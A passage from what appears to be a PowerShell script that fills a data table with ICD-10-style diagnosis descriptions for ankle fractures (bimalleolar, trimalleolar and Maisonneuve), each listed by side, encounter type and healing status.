leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of right lower leg","Nondisplaced bimalleolar fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of left lower leg","Nondisplaced bimalleolar fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced bimalleolar fracture of unspecified lower leg","Nondisplaced bimalleolar fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of right lower leg","Displaced trimalleolar fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of left lower leg","Displaced trimalleolar fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced trimalleolar fracture of unspecified lower leg","Displaced trimalleolar fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of right lower leg","Nondisplaced trimalleolar fracture of right lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of left lower leg","Nondisplaced trimalleolar fracture of left lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Nondisplaced trimalleolar fracture of unspecified lower leg","Nondisplaced trimalleolar fracture of unspecified lower leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of right leg","Displaced Maisonneuve's fracture of right leg, sequela") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, initial encounter for closed fracture") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, initial encounter for open fracture type I or II") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, initial encounter for open fracture type IIIA, IIIB, or IIIC") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with routine healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with delayed healing") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with nonunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for closed fracture with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type I or II with malunion") + $null = $DiagnosisList.Rows.Add("Displaced Maisonneuve's fracture of left leg","Displaced Maisonneuve's fracture of left leg, subsequent encounter for open fracture type IIIA, IIIB, or IIIC with malunion") + $null = 